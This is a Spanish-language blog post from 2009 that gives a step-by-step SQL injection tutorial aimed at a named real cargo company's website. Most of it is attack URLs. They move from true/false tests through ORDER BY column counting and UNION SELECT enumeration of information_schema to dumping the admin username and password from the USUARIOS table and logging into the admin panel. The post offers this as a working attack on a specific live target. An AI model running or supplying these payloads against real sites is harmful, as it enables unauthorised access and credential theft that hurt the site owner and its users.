Este es mi primir articulo aki explicare como injectar la web de SERVOCARGO . . .
Disculpen si no pongo un video tutorial cuando pueda lo hago ya q estoy en linux y ya queria hacer una publicacion =P, bueno al tema!
- VERIFICAR SI LA WEB ES VULNERABLE
Vamos a la hoja de noticias:
http://www.servosacargo.com/dnoticia.php?idn=44
verificamos si la hoja es vulnerable usaremos valores verdaderos y falso ..
http://www.servosacargo.com/dnoticia.php?idn=44+and+1=1
con esto no varia nada ya que 1=1 pero que pasa si ponemos 1=0?
Como 1 no es igual a 0, no se realizará la consulta, de tal modo no apareceran datos en la web. Ahora sabemos que la web es vulnerable.
- AVERIGUAR CUAL ES EL NUMERO DE COLUMNAS Y HACIENDO CONSULTAS
EN esta parte podemos ir averiguando el numero de columnas con ->> order+by+1 asi vamos incrementando el 1 hasta q la pagina nos de error que es en order+by+9 ahora ya sabemos que el numero de columnas es 8.
Pasamos hacer la consulta http://www.servosacargo.com/dnoticia.php?idn=-1+UNION+SELECT+0,1,2,3,4,5,6,7,8
qui nos dara los campos que se imprimen que son 1,3,5,8 en ellas imprimiremos resultados.
estas son las impresiones usuales a modo de prueba
http://www.servosacargo.com/dnoticia.php?idn=-1+UNION+SELECT+0,version(),2,database(),4,5,6,7,8
version(): Devuelve la versión del servidor SQL.
database(): Devuelve el nombre de la base de datos
- HORA DE BUSCAR LA TABLA Y COLUMNA
Ahora haremos limit para recorrer las tablas de la base de datos en busca de la tabla de users.
http://www.servosacargo.com/dnoticia.php?idn=-1+UNION+SELECT+0,table_name,2,3,4,5,
6,7,8+from+information_schema.tables+limit+1,1
http://www.servosacargo.com/dnoticia.php?idn=-1+UNION+SELECT+0,table_name,2,3,4,5,
6,7,8+from+information_schema.tables+limit+2,1
Hasta llegar a ..
http://www.servosacargo.com/dnoticia.php?idn=-1+UNION+SELECT+0,table_name,2,3,4,5,
6,7,8+from+information_schema.tables+limit+22,1
y el nombre de la tabla sera impreso en la pagina :
Nombre de la tabla: USUARIOS
Ahora ya teniendo la tabla USUARIOS buscamos las columnas de usuario y pass con :
http://www.servosacargo.com/dnoticia.php?idn=-1+UNION+SELECT+0,column_name,2,3,4,5,
6,7,8+from+information_schema.columns+where+table_name=
char(85,83,85,65,82,73,79,83)+and+column_name+like+char(37,63,37)
en esta parte char(85,83,85,65,82,73,79,83) = char(USUARIOS)
USUARIOS en ascii = 85,83,85,65,82,73,79,83
Aqui nos imprimira el nombre de la columna: USU_USUARIO
En char(37,64,37) el 64 lo incrementamos (ai vamos traceando) hasta que nos de las columnas de pass . . q esta en . .
http://www.servosacargo.com/dnoticia.php?idn=-1+UNION+SELECT+0,column_name,2,3,4,5,
6,7,8+from+information_schema.columns+where+table_name=
char(85,83,85,65,82,73,79,83)+and+column_name+like+char(37,67,37)
columna: USU_CONTRASENA
Y LISTO!! solo queda en hacer la injection !!
http://www.servosacargo.com/dnoticia.php?idn=-1+UNION+SELECT+0,USU_USUARIO,2,USU_CONTRASENA,
4,5,6,7,8+from+USUARIOS
TALAN!! nos imprimio el user y el pass del admin este por defecto es el id=1.
weno ahora pasamos a logearnos . . SI lo hiciste bien t saldra el user y pas del admin =P
http://www.servosacargo.com/admin
Y eso es todo espero que les aya agradado y hasta pronto!
by D4rkD3m0n
lunes, 26 de octubre de 2009
Suscribirse a:
Entradas (Atom)